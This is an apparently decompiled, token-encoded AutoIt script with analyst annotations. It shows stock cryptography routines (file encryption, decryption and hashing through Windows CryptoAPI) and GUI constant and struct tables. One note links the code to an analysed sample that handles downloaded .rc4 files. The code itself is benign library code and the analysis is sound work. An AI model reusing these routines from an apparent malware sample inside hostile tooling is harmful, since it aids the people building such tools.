| 28$aret = 0, $tbuff = 0, $ttempstruct = 0, $ierror = 0, $iextended = 0, $iplaintextsize = 0, $vreturn = 0 | |
| _crypt_startup() | |
| 4@error534287(@error, @extended, -1) | |
| ; Single-pass Do ... Until True loop: "18" (ExitLoop) jumps to the cleanup at the end. | |
| 11 | |
| 4$ialgid <> $calg_userkey5 | |
| $vcryptkey = _crypt_derivekey($vcryptkey, $ialgid) | |
| 4@error5 | |
| $ierror = @error | |
| $iextended = @extended | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| 8 | |
| ; Working buffer is the input length plus 1000 bytes; the input is copied in only when it is non-empty. | |
| $tbuff = 65("byte[" & 14($vdata) + 1000 & "]") | |
| 414($vdata) > 0569($tbuff, 1, $vdata) | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptDecrypt", "handle", $vcryptkey, "handle", 0, "bool", $bfinal, "dword", 0, "struct*", $tbuff, "dword*", 14($vdata)) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 70 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| ; Element [6] is the in/out length: the number of plaintext bytes produced. | |
| $iplaintextsize = $aret[6] | |
| ; Overlay a second struct on the same memory (67 is presumably DllStructGetPtr) and return only the plaintext bytes. | |
| $ttempstruct = 65("byte[" & $iplaintextsize + 1 & "]", 67($tbuff)) | |
| $vreturn = 15(66($ttempstruct, 1), 1, $iplaintextsize) | |
| 1239 | |
| ; Cleanup: destroy the key only if it was derived here, then drop the provider reference. | |
| 4$ialgid <> $calg_userkey5_crypt_destroykey($vcryptkey) | |
| _crypt_shutdown() | |
| 34287($ierror, $iextended, $vreturn) | |
| 33 | |
| ; _crypt_hashdata: hashes $vdata with algorithm $ialgid, in one shot or incrementally. | |
| ; With $bfinal set (default token 39, apparently True) it returns the digest bytes and destroys the hash object; otherwise it returns the hash handle so the caller can pass it back in $hcrypthash with more data. | |
| ; Returns -1 with @error offset by 10 (create), 20 (hash data), 30 (digest size) or 40 (digest value) on failure. | |
| 32_crypt_hashdata($vdata, $ialgid, $bfinal = 39, $hcrypthash = 0) | |
| 28$aret = 0, $tbuff = 0, $ierror = 0, $iextended = 0, $ihashsize = 0, $vreturn = 0 | |
| _crypt_startup() | |
| 4@error534287(@error, @extended, -1) | |
| ; Single-pass Do ... Until True loop: "18" (ExitLoop) jumps to the cleanup at the end. | |
| 11 | |
| ; Create a hash object only when the caller did not pass one in. | |
| 4$hcrypthash = 05 | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptCreateHash", "handle", __crypt_context(), "uint", $ialgid, "ptr", 0, "dword", 0, "handle*", 0) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 10 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| $hcrypthash = $aret[5] | |
| 8 | |
| ; Copy the data into a byte buffer of the same length and feed it to the hash. | |
| $tbuff = 65("byte[" & 14($vdata) & "]") | |
| 69($tbuff, 1, $vdata) | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptHashData", "handle", $hcrypthash, "struct*", $tbuff, "dword", 68($tbuff), "dword", $crypt_userdata) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 20 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| 4$bfinal5 | |
| ; Finalise: query the digest size ($hp_hashsize), then read the digest itself ($hp_hashval). | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptGetHashParam", "handle", $hcrypthash, "dword", $hp_hashsize, "dword*", 0, "dword*", 4, "dword", 0) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 30 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| $ihashsize = $aret[3] | |
| $tbuff = 65("byte[" & $ihashsize & "]") | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptGetHashParam", "handle", $hcrypthash, "dword", $hp_hashval, "struct*", $tbuff, "dword*", $ihashsize, "dword", 0) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 40 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| $vreturn = 66($tbuff, 1) | |
| 6 | |
| ; Not final: hand the live hash object back to the caller. | |
| $vreturn = $hcrypthash | |
| 8 | |
| 1239 | |
| ; The hash object is destroyed only on a final call ("1" reads as And); in the incremental case it stays open, on the error paths as well. | |
| 4$hcrypthash <> 01$bfinal558(__crypt_dllhandle(), "bool", "CryptDestroyHash", "handle", $hcrypthash) | |
| _crypt_shutdown() | |
| 34287($ierror, $iextended, $vreturn) | |
| 33 | |
| ; _crypt_hashfile: hashes the file at $sfilepath with algorithm $ialgid by feeding it to _crypt_hashdata in 512 KiB chunks. | |
| ; Returns the digest, or -1 with @error 1 (file could not be opened), the finalisation error, or 100 and up (a chunk failed to hash). | |
| 32_crypt_hashfile($sfilepath, $ialgid) | |
| 28$dtempdata = 0, $hfile = 0, $hhashobject = 0, $ierror = 0, $iextended = 0, $vreturn = 0 | |
| _crypt_startup() | |
| 4@error534287(@error, @extended, -1) | |
| ; Outer single-pass loop (Do ... Until True) gives the error paths one exit point. | |
| 11 | |
| ; 110(...) is presumably FileOpen in binary mode; -1 signals failure. | |
| $hfile = 110($sfilepath, $fo_binary) | |
| 4$hfile = -15 | |
| $ierror = 1 | |
| $iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| ; Inner read loop (Do ... Until False): left only through "182", i.e. ExitLoop 2, which leaves both loops. | |
| 11 | |
| $dtempdata = 112($hfile, 512 * 1024) | |
| ; 112(...) is presumably FileRead; @error after it is treated as end of file, and the hash is finalised. | |
| 4@error5 | |
| $vreturn = _crypt_hashdata($dtempdata, $ialgid, 39, $hhashobject) | |
| 4@error5 | |
| $ierror = @error | |
| $iextended = @extended | |
| $vreturn = -1 | |
| 182 | |
| 8 | |
| 182 | |
| 6 | |
| ; More data follows: update the running hash and keep its handle. | |
| $hhashobject = _crypt_hashdata($dtempdata, $ialgid, 40, $hhashobject) | |
| 4@error5 | |
| $ierror = @error + 100 | |
| $iextended = @extended | |
| $vreturn = -1 | |
| 182 | |
| 8 | |
| 8 | |
| 1240 | |
| 1239 | |
| _crypt_shutdown() | |
| ; 90(...) is presumably FileClose. | |
| 4$hfile <> -1590($hfile) | |
| 34287($ierror, $iextended, $vreturn) | |
| 33 | |
| ; _crypt_encryptfile: encrypts $ssourcefile into $sdestinationfile in 1 MiB chunks. | |
| ; $vcryptkey is a password (a key is derived once, up front) unless $ialgid is $calg_userkey, in which case it is used as a key handle. | |
| ; Returns token 39 (apparently True) on success, or token 40 (apparently False) with @error set: the derivation error, 2 (source open), 3 (destination open), 400 and up (final chunk) or 500 and up (intermediate chunk). | |
| 32_crypt_encryptfile($ssourcefile, $sdestinationfile, $vcryptkey, $ialgid) | |
| ; 105(...) is presumably FileGetSize; the size is compared with the running byte count to detect the last chunk. | |
| 28$dtempdata = 0, $hinfile = 0, $houtfile = 0, $ierror = 0, $iextended = 0, $ifilesize = 105($ssourcefile), $iread = 0, $breturn = 39 | |
| _crypt_startup() | |
| 4@error534287(@error, @extended, -1) | |
| ; Outer single-pass loop (Do ... Until True) gives the error paths one exit point. | |
| 11 | |
| 4$ialgid <> $calg_userkey5 | |
| $vcryptkey = _crypt_derivekey($vcryptkey, $ialgid) | |
| 4@error5 | |
| $ierror = @error | |
| $iextended = @extended | |
| $breturn = 40 | |
| 18 | |
| 8 | |
| 8 | |
| $hinfile = 110($ssourcefile, $fo_binary) | |
| 4$hinfile = -15 | |
| $ierror = 2 | |
| $iextended = _winapi_getlasterror() | |
| $breturn = 40 | |
| 18 | |
| 8 | |
| ; The destination is opened for overwrite, and missing directories are created ($fo_createpath). | |
| $houtfile = 110($sdestinationfile, $fo_overwrite + $fo_createpath + $fo_binary) | |
| 4$houtfile = -15 | |
| $ierror = 3 | |
| $iextended = _winapi_getlasterror() | |
| $breturn = 40 | |
| 18 | |
| 8 | |
| ; Inner chunk loop (Do ... Until False): left only through "182", i.e. ExitLoop 2. | |
| 11 | |
| $dtempdata = 112($hinfile, 1024 * 1024) | |
| $iread += 14($dtempdata) | |
| 4$iread = $ifilesize5 | |
| ; Last chunk: encrypt with the final flag set. | |
| $dtempdata = _crypt_encryptdata($dtempdata, $vcryptkey, $calg_userkey, 39) | |
| 4@error5 | |
| $ierror = @error + 400 | |
| $iextended = @extended | |
| $breturn = 40 | |
| 8 | |
| ; NOTE(review): this write also runs when the final encryption failed, so the failure value returned by _crypt_encryptdata is written to the output. 123(...) is presumably FileWrite. | |
| 123($houtfile, $dtempdata) | |
| 182 | |
| 6 | |
| $dtempdata = _crypt_encryptdata($dtempdata, $vcryptkey, $calg_userkey, 40) | |
| 4@error5 | |
| $ierror = @error + 500 | |
| $iextended = @extended | |
| $breturn = 40 | |
| 182 | |
| 8 | |
| 123($houtfile, $dtempdata) | |
| 8 | |
| 1240 | |
| 1239 | |
| ; Cleanup: destroy the key only if it was derived here, drop the provider reference, close both files. | |
| 4$ialgid <> $calg_userkey5_crypt_destroykey($vcryptkey) | |
| _crypt_shutdown() | |
| 4$hinfile <> -1590($hinfile) | |
| 4$houtfile <> -1590($houtfile) | |
| 34287($ierror, $iextended, $breturn) | |
| 33 | |
| ; _crypt_decryptfile: decrypts $ssourcefile into $sdestinationfile in 1 MiB chunks; mirror image of _crypt_encryptfile. | |
| ; $vcryptkey is a password (a key is derived once, up front) unless $ialgid is $calg_userkey, in which case it is used as a key handle. | |
| ; Returns token 39 (apparently True) on success, or token 40 (apparently False) with @error set: the derivation error, 2 (source open), 3 (destination open), 400 and up (final chunk) or 500 and up (intermediate chunk). | |
| ; Analyst note: the block appears to match AutoIt's stock Crypt.au3; whether and how the sample calls it (for example on the downloaded .rc4 files named in the config) is not visible in this section. | |
| 32_crypt_decryptfile($ssourcefile, $sdestinationfile, $vcryptkey, $ialgid) | |
| ; 105(...) is presumably FileGetSize; the size is compared with the running byte count to detect the last chunk. | |
| 28$dtempdata = 0, $hinfile = 0, $houtfile = 0, $ierror = 0, $iextended = 0, $ifilesize = 105($ssourcefile), $iread = 0, $breturn = 39 | |
| _crypt_startup() | |
| 4@error534287(@error, @extended, -1) | |
| ; Outer single-pass loop (Do ... Until True) gives the error paths one exit point. | |
| 11 | |
| 4$ialgid <> $calg_userkey5 | |
| $vcryptkey = _crypt_derivekey($vcryptkey, $ialgid) | |
| 4@error5 | |
| $ierror = @error | |
| $iextended = @extended | |
| $breturn = 40 | |
| 18 | |
| 8 | |
| 8 | |
| $hinfile = 110($ssourcefile, $fo_binary) | |
| 4$hinfile = -15 | |
| $ierror = 2 | |
| $iextended = _winapi_getlasterror() | |
| $breturn = 40 | |
| 18 | |
| 8 | |
| ; The destination is opened for overwrite, and missing directories are created ($fo_createpath). | |
| $houtfile = 110($sdestinationfile, $fo_overwrite + $fo_createpath + $fo_binary) | |
| 4$houtfile = -15 | |
| $ierror = 3 | |
| $iextended = _winapi_getlasterror() | |
| $breturn = 40 | |
| 18 | |
| 8 | |
| ; Inner chunk loop (Do ... Until False): left only through "182", i.e. ExitLoop 2. | |
| 11 | |
| $dtempdata = 112($hinfile, 1024 * 1024) | |
| $iread += 14($dtempdata) | |
| 4$iread = $ifilesize5 | |
| ; Last chunk: decrypt with the final flag set. | |
| $dtempdata = _crypt_decryptdata($dtempdata, $vcryptkey, $calg_userkey, 39) | |
| 4@error5 | |
| $ierror = @error + 400 | |
| $iextended = @extended | |
| $breturn = 40 | |
| 8 | |
| ; NOTE(review): this write also runs when the final decryption failed, so the failure value returned by _crypt_decryptdata is written to the output. 123(...) is presumably FileWrite. | |
| 123($houtfile, $dtempdata) | |
| 182 | |
| 6 | |
| $dtempdata = _crypt_decryptdata($dtempdata, $vcryptkey, $calg_userkey, 40) | |
| 4@error5 | |
| $ierror = @error + 500 | |
| $iextended = @extended | |
| $breturn = 40 | |
| 182 | |
| 8 | |
| 123($houtfile, $dtempdata) | |
| 8 | |
| 1240 | |
| 1239 | |
| ; Cleanup: destroy the key only if it was derived here, drop the provider reference, close both files. | |
| 4$ialgid <> $calg_userkey5_crypt_destroykey($vcryptkey) | |
| _crypt_shutdown() | |
| 4$hinfile <> -1590($hinfile) | |
| 4$houtfile <> -1590($houtfile) | |
| 34287($ierror, $iextended, $breturn) | |
| 33 | |
| ; _crypt_genrandom: fills the caller's buffer $pbuffer with $isize bytes from CryptGenRandom. | |
| ; Returns token 39 (apparently True) on success, or token 40 (apparently False) with @error offset by 10. | |
| 32_crypt_genrandom($pbuffer, $isize) | |
| _crypt_startup() | |
| 4@error534287(@error, @extended, 40) | |
| 28$aret = 58(__crypt_dllhandle(), "bool", "CryptGenRandom", "handle", __crypt_context(), "dword", $isize, "struct*", $pbuffer) | |
| ; Capture the error state before _crypt_shutdown can change it. | |
| 28$ierror = @error, $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| _crypt_shutdown() | |
| 4$ierror2(3$aret[0])5 | |
| 34287($ierror + 10, $iextended, 40) | |
| 6 | |
| 3439 | |
| 8 | |
| 33 | |
| ; __crypt_refcount: returns slot [0] of the shared crypt state, the startup reference count. | |
| 32__crypt_refcount() | |
| 34$__g_acryptinternaldata[0] | |
| 33 | |
| ; __crypt_refcountinc: adds one to the startup reference count in slot [0]. | |
| 32__crypt_refcountinc() | |
| $__g_acryptinternaldata[0] += 1 | |
| 33 | |
| ; __crypt_refcountdec: subtracts one from the reference count in slot [0], never going below zero. | |
| 32__crypt_refcountdec() | |
| 4$__g_acryptinternaldata[0] > 05$__g_acryptinternaldata[0] -= 1 | |
| 33 | |
| ; __crypt_dllhandle: returns slot [1] of the shared crypt state, the Advapi32 handle stored by _crypt_startup. | |
| 32__crypt_dllhandle() | |
| 34$__g_acryptinternaldata[1] | |
| 33 | |
| ; __crypt_dllhandleset: stores the DLL handle in slot [1] of the shared crypt state. | |
| 32__crypt_dllhandleset($hadvapi32) | |
| $__g_acryptinternaldata[1] = $hadvapi32 | |
| 33 | |
| ; __crypt_context: returns slot [2] of the shared crypt state, the provider context stored by _crypt_startup. | |
| 32__crypt_context() | |
| 34$__g_acryptinternaldata[2] | |
| 33 | |
| ; __crypt_contextset: stores the provider context in slot [2] of the shared crypt state. | |
| 32__crypt_contextset($hcryptcontext) | |
| $__g_acryptinternaldata[2] = $hcryptcontext | |
| 33 | |
| ; __crypt_getcalgfromcryptkey: asks CryptGetKeyParam ($kp_algid) which algorithm a key handle belongs to and returns that ALG_ID. | |
| ; On failure @error is offset by 80. NOTE(review): the value returned in that case is $crypt_userdata (1), not an ALG_ID; callers are expected to check @error. | |
| 32__crypt_getcalgfromcryptkey($vcryptkey) | |
| ; A one-field "uint" struct receives the ALG_ID (65/68/66 are presumably DllStructCreate/DllStructGetSize/DllStructGetData). | |
| 28$talgid = 65("uint") | |
| 28$aret = 58(__crypt_dllhandle(), "bool", "CryptGetKeyParam", "handle", $vcryptkey, "dword", $kp_algid, "struct*", $talgid, "dword*", 68($talgid), "dword", 0) | |
| 28$ierror = @error, $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| 4$ierror23$aret[0]5 | |
| 34287($ierror + 80, $iextended, $crypt_userdata) | |
| 6 | |
| 3466($talgid, 1) | |
| 8 | |
| 33 | |
| 2930$fw_dontcare = 0 | |
| 2930$fw_thin = 100 | |
| 2930$fw_extralight = 200 | |
| 2930$fw_ultralight = 200 | |
| 2930$fw_light = 300 | |
| 2930$fw_normal = 400 | |
| 2930$fw_regular = 400 | |
| 2930$fw_medium = 500 | |
| 2930$fw_semibold = 600 | |
| 2930$fw_demibold = 600 | |
| 2930$fw_bold = 700 | |
| 2930$fw_extrabold = 800 | |
| 2930$fw_ultrabold = 800 | |
| 2930$fw_heavy = 900 | |
| 2930$fw_black = 900 | |
| 2930$cf_effects = 256 | |
| 2930$cf_printerfonts = 2 | |
| 2930$cf_screenfonts = 1 | |
| 2930$cf_noscriptsel = 8388608 | |
| 2930$cf_inittologfontstruct = 64 | |
| 2930$logpixelsx = 88 | |
| 2930$logpixelsy = 90 | |
| 2930$ansi_charset = 0 | |
| 2930$arabic_charset = 178 | |
| 2930$baltic_charset = 186 | |
| 2930$chinesebig5_charset = 136 | |
| 2930$default_charset = 1 | |
| 2930$easteurope_charset = 238 | |
| 2930$gb2312_charset = 134 | |
| 2930$greek_charset = 161 | |
| 2930$hangeul_charset = 129 | |
| 2930$hebrew_charset = 177 | |
| 2930$johab_charset = 130 | |
| 2930$mac_charset = 77 | |
| 2930$oem_charset = 255 | |
| 2930$russian_charset = 204 | |
| 2930$shiftjis_charset = 128 | |
| 2930$symbol_charset = 2 | |
| 2930$thai_charset = 222 | |
| 2930$turkish_charset = 162 | |
| 2930$vietnamese_charset = 163 | |
| 2930$out_character_precis = 2 | |
| 2930$out_default_precis = 0 | |
| 2930$out_device_precis = 5 | |
| 2930$out_outline_precis = 8 | |
| 2930$out_ps_only_precis = 10 | |
| 2930$out_raster_precis = 6 | |
| 2930$out_string_precis = 1 | |
| 2930$out_stroke_precis = 3 | |
| 2930$out_tt_only_precis = 7 | |
| 2930$out_tt_precis = 4 | |
| 2930$clip_character_precis = 1 | |
| 2930$clip_default_precis = 0 | |
| 2930$clip_dfa_disable = 48 | |
| 2930$clip_embedded = 128 | |
| 2930$clip_lh_angles = 16 | |
| 2930$clip_mask = 15 | |
| 2930$clip_dfa_override = 64 | |
| 2930$clip_stroke_precis = 2 | |
| 2930$clip_tt_always = 32 | |
| 2930$antialiased_quality = 4 | |
| 2930$default_quality = 0 | |
| 2930$draft_quality = 1 | |
| 2930$nonantialiased_quality = 3 | |
| 2930$proof_quality = 2 | |
| 2930$cleartype_quality = 5 | |
| 2930$default_pitch = 0 | |
| 2930$fixed_pitch = 1 | |
| 2930$variable_pitch = 2 | |
| 2930$ff_decorative = 80 | |
| 2930$ff_dontcare = 0 | |
| 2930$ff_modern = 48 | |
| 2930$ff_roman = 16 | |
| 2930$ff_script = 64 | |
| 2930$ff_swiss = 32 | |
| 2930$fs_regular = 0 | |
| 2930$fs_bold = 1 | |
| 2930$fs_italic = 2 | |
| 2930$tagpoint = "struct;long X;long Y;endstruct" | |
| 2930$tagrect = "struct;long Left;long Top;long Right;long Bottom;endstruct" | |
| 2930$tagsize = "struct;long X;long Y;endstruct" | |
| 2930$tagmargins = "int cxLeftWidth;int cxRightWidth;int cyTopHeight;int cyBottomHeight" | |
| 2930$tagfiletime = "struct;dword Lo;dword Hi;endstruct" | |
| 2930$tagsystemtime = "struct;word Year;word Month;word Dow;word Day;word Hour;word Minute;word Second;word MSeconds;endstruct" | |
| 2930$tagtime_zone_information = "struct;long Bias;wchar StdName[32];word StdDate[8];long StdBias;wchar DayName[32];word DayDate[8];long DayBias;endstruct" | |
| 2930$tagnmhdr = "struct;hwnd hWndFrom;uint_ptr IDFrom;INT Code;endstruct" | |
| 2930$tagcomboboxexitem = "uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;int SelectedImage;int OverlayImage;" & "int Indent;lparam Param" | |
| 2930$tagnmcbedragbegin = $tagnmhdr & ";int ItemID;wchar szText[260]" | |
| 2930$tagnmcbeendedit = $tagnmhdr & ";bool fChanged;int NewSelection;wchar szText[260];int Why" | |
| 2930$tagnmcomboboxex = $tagnmhdr & ";uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;" & "int SelectedImage;int OverlayImage;int Indent;lparam Param" | |
| 2930$tagdtprange = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;" & "word MinSecond;word MinMSecond;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;" & "word MaxMinute;word MaxSecond;word MaxMSecond;bool MinValid;bool MaxValid" | |
| 2930$tagnmdatetimechange = $tagnmhdr & ";dword Flag;" & $tagsystemtime | |
| 2930$tagnmdatetimeformat = $tagnmhdr & ";ptr Format;" & $tagsystemtime & ";ptr pDisplay;wchar Display[64]" | |
| 2930$tagnmdatetimeformatquery = $tagnmhdr & ";ptr Format;struct;long SizeX;long SizeY;endstruct" | |
| 2930$tagnmdatetimekeydown = $tagnmhdr & ";int VirtKey;ptr Format;" & $tagsystemtime | |
| 2930$tagnmdatetimestring = $tagnmhdr & ";ptr UserString;" & $tagsystemtime & ";dword Flags" | |
| 2930$tageventlogrecord = "dword Length;dword Reserved;dword RecordNumber;dword TimeGenerated;dword TimeWritten;dword EventID;" & "word EventType;word NumStrings;word EventCategory;word ReservedFlags;dword ClosingRecordNumber;dword StringOffset;" & "dword UserSidLength;dword UserSidOffset;dword DataLength;dword DataOffset" | |
| 2930$taggdip_effectparams_blur = "float Radius; bool ExpandEdge" | |
| 2930$taggdip_effectparams_brightnesscontrast = "int BrightnessLevel; int ContrastLevel" | |
| 2930$taggdip_effectparams_colorbalance = "int CyanRed; int MagentaGreen; int YellowBlue" | |
| 2930$taggdip_effectparams_colorcurve = "int Adjustment; int Channel; int AdjustValue" | |
| 2930$taggdip_effectparams_colorlut = "byte LutB[256]; byte LutG[256]; byte LutR[256]; byte LutA[256]" | |
| 2930$taggdip_effectparams_huesaturationlightness = "int HueLevel; int SaturationLevel; int LightnessLevel" | |
| 2930$taggdip_effectparams_levels = "int Highlight; int Midtone; int Shadow" | |
| 2930$taggdip_effectparams_redeyecorrection = "uint NumberOfAreas; ptr Areas" | |
| 2930$taggdip_effectparams_sharpen = "float Radius; float Amount" | |
| 2930$taggdip_effectparams_tint = "int Hue; int Amount" | |
| 2930$taggdipbitmapdata = "uint Width;uint Height;int Stride;int Format;ptr Scan0;uint_ptr Reserved" | |
| 2930$taggdipcolormatrix = "float m[25]" | |
| 2930$taggdipencoderparam = "struct;byte GUID[16];ulong NumberOfValues;ulong Type;ptr Values;endstruct" | |
| 2930$taggdipencoderparams = "uint Count;" & $taggdipencoderparam | |
| 2930$taggdiprectf = "struct;float X;float Y;float Width;float Height;endstruct" | |
| 2930$taggdipstartupinput = "uint Version;ptr Callback;bool NoThread;bool NoCodecs" | |
| 2930$taggdipstartupoutput = "ptr HookProc;ptr UnhookProc" | |
| 2930$taggdipimagecodecinfo = "byte CLSID[16];byte FormatID[16];ptr CodecName;ptr DllName;ptr FormatDesc;ptr FileExt;" & "ptr MimeType;dword Flags;dword Version;dword SigCount;dword SigSize;ptr SigPattern;ptr SigMask" | |
| 2930$taggdippencoderparams = "uint Count;byte Params[1]" | |
| 2930$taghditem = "uint Mask;int XY;ptr Text;handle hBMP;int TextMax;int Fmt;lparam Param;int Image;int Order;uint Type;ptr pFilter;uint State" | |
| 2930$tagnmhddispinfo = $tagnmhdr & ";int Item;uint Mask;ptr Text;int TextMax;int Image;lparam lParam" | |
| 2930$tagnmhdfilterbtnclick = $tagnmhdr & ";int Item;" & $tagrect | |
| 2930$tagnmheader = $tagnmhdr & ";int Item;int Button;ptr pItem" | |
| 2930$taggetipaddress = "byte Field4;byte Field3;byte Field2;byte Field1" | |
| 2930$tagnmipaddress = $tagnmhdr & ";int Field;int Value" | |
| 2930$taglvfindinfo = "struct;uint Flags;ptr Text;lparam Param;" & $tagpoint & ";uint Direction;endstruct" | |
| 2930$taglvhittestinfo = $tagpoint & ";uint Flags;int Item;int SubItem;int iGroup" | |
| 2930$taglvitem = "struct;uint Mask;int Item;int SubItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;lparam Param;" & "int Indent;int GroupID;uint Columns;ptr pColumns;ptr piColFmt;int iGroup;endstruct" | |
| 2930$tagnmlistview = $tagnmhdr & ";int Item;int SubItem;uint NewState;uint OldState;uint Changed;" & "struct;long ActionX;long ActionY;endstruct;lparam Param" | |
| 2930$tagnmlvcustomdraw = "struct;" & $tagnmhdr & ";dword dwDrawStage;handle hdc;" & $tagrect & ";dword_ptr dwItemSpec;uint uItemState;lparam lItemlParam;endstruct" & ";dword clrText;dword clrTextBk;int iSubItem;dword dwItemType;dword clrFace;int iIconEffect;" & "int iIconPhase;int iPartID;int iStateID;struct;long TextLeft;long TextTop;long TextRight;long TextBottom;endstruct;uint uAlign" | |
| 2930$tagnmlvdispinfo = $tagnmhdr & ";" & $taglvitem | |
| 2930$tagnmlvfinditem = $tagnmhdr & ";int Start;" & $taglvfindinfo | |
| 2930$tagnmlvgetinfotip = $tagnmhdr & ";dword Flags;ptr Text;int TextMax;int Item;int SubItem;lparam lParam" | |
| 2930$tagnmitemactivate = $tagnmhdr & ";int Index;int SubItem;uint NewState;uint OldState;uint Changed;" & $tagpoint & ";lparam lParam;uint KeyFlags" | |
| 2930$tagnmlvkeydown = "align 1;" & $tagnmhdr & ";word VKey;uint Flags" | |
| 2930$tagnmlvscroll = $tagnmhdr & ";int DX;int DY" | |
| 2930$tagmchittestinfo = "uint Size;" & $tagpoint & ";uint Hit;" & $tagsystemtime & ";" & $tagrect & ";int iOffset;int iRow;int iCol" | |
| 2930$tagmcmonthrange = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short Span" | |
| 2930$tagmcrange = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short MinSet;short MaxSet" | |
| 2930$tagmcselrange = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds" | |
| 2930$tagnmdaystate = $tagnmhdr & ";" & $tagsystemtime & ";int DayState;ptr pDayState" | |
| 2930$tagnmselchange = $tagnmhdr & ";struct;word BegYear;word BegMonth;word BegDOW;word BegDay;word BegHour;word BegMinute;word BegSecond;word BegMSeconds;endstruct;" & "struct;word EndYear;word EndMonth;word EndDOW;word EndDay;word EndHour;word EndMinute;word EndSecond;word EndMSeconds;endstruct" | |
| 2930$tagnmobjectnotify = $tagnmhdr & ";int Item;ptr piid;ptr pObject;long Result;dword dwFlags" | |
| 2930$tagnmtckeydown = "align 1;" & $tagnmhdr & ";word VKey;uint Flags" | |
| 2930$tagtvitem = "struct;uint Mask;handle hItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;int SelectedImage;" & "int Children;lparam Param;endstruct" | |
| 2930$tagtvitemex = "struct;" & $tagtvitem & ";int Integral;uint uStateEx;hwnd hwnd;int iExpandedImage;int iReserved;endstruct" | |
| 2930$tagnmtreeview = $tagnmhdr & ";uint Action;" & "struct;uint OldMask;handle OldhItem;uint OldState;uint OldStateMask;" & "ptr OldText;int OldTextMax;int OldImage;int OldSelectedImage;int OldChildren;lparam OldParam;endstruct;" & "struct;uint NewMask;handle NewhItem;uint NewState;uint NewStateMask;" & "ptr NewText;int NewTextMax;int NewImage;int NewSelectedImage;int NewChildren;lparam NewParam;endstruct;" & "struct;long PointX;long PointY;endstruct" | |
| 2930$tagnmtvcustomdraw = "struct;" & $tagnmhdr & ";dword DrawStage;handle HDC;" & $tagrect & ";dword_ptr ItemSpec;uint ItemState;lparam ItemParam;endstruct" & ";dword ClrText;dword ClrTextBk;int Level" | |
| 2930$tagnmtvdispinfo = $tagnmhdr & ";" & $tagtvitem | |
| 2930$tagnmtvgetinfotip = $tagnmhdr & ";ptr Text;int TextMax;handle hItem;lparam lParam" | |
| 2930$tagnmtvitemchange = $tagnmhdr & ";uint Changed;handle hItem;uint StateNew;uint StateOld;lparam lParam;" | |
| 2930$tagtvhittestinfo = $tagpoint & ";uint Flags;handle Item" | |
| 2930$tagnmtvkeydown = "align 1;" & $tagnmhdr & ";word VKey;uint Flags" | |
| 2930$tagnmmouse = $tagnmhdr & ";dword_ptr ItemSpec;dword_ptr ItemData;" & $tagpoint & ";lparam HitInfo" | |
| 2930$tagtoken_privileges = "dword Count;align 4;int64 LUID;dword Attributes" | |
| 2930$tagimageinfo = "handle hBitmap;handle hMask;int Unused1;int Unused2;" & $tagrect | |
| 2930$tagmenuinfo = "dword Size;INT Mask;dword Style;uint YMax;handle hBack;dword ContextHelpID;ulong_ptr MenuData" | |
| 2930$tagmenuiteminfo = "uint Size;uint Mask;uint Type;uint State;uint ID;handle SubMenu;handle BmpChecked;handle BmpUnchecked;" & "ulong_ptr ItemData;ptr TypeData;uint CCH;handle BmpItem" | |
| 2930$tagrebarbandinfo = "uint cbSize;uint fMask;uint fStyle;dword clrFore;dword clrBack;ptr lpText;uint cch;" & "int iImage;hwnd hwndChild;uint cxMinChild;uint cyMinChild;uint cx;handle hbmBack;uint wID;uint cyChild;uint cyMaxChild;" & "uint cyIntegral;uint cxIdeal;lparam lParam;uint cxHeader" & ((@OSVersion = "WIN_XP") ? "" : ";" & $tagrect & ";uint uChevronState") | |
| 2930$tagnmrebarautobreak = $tagnmhdr & ";uint uBand;uint wID;lparam lParam;uint uMsg;uint fStyleCurrent;bool fAutoBreak" | |
| 2930$tagnmrbautosize = $tagnmhdr & ";bool fChanged;" & "struct;long TargetLeft;long TargetTop;long TargetRight;long TargetBottom;endstruct;" & "struct;long ActualLeft;long ActualTop;long ActualRight;long ActualBottom;endstruct" | |
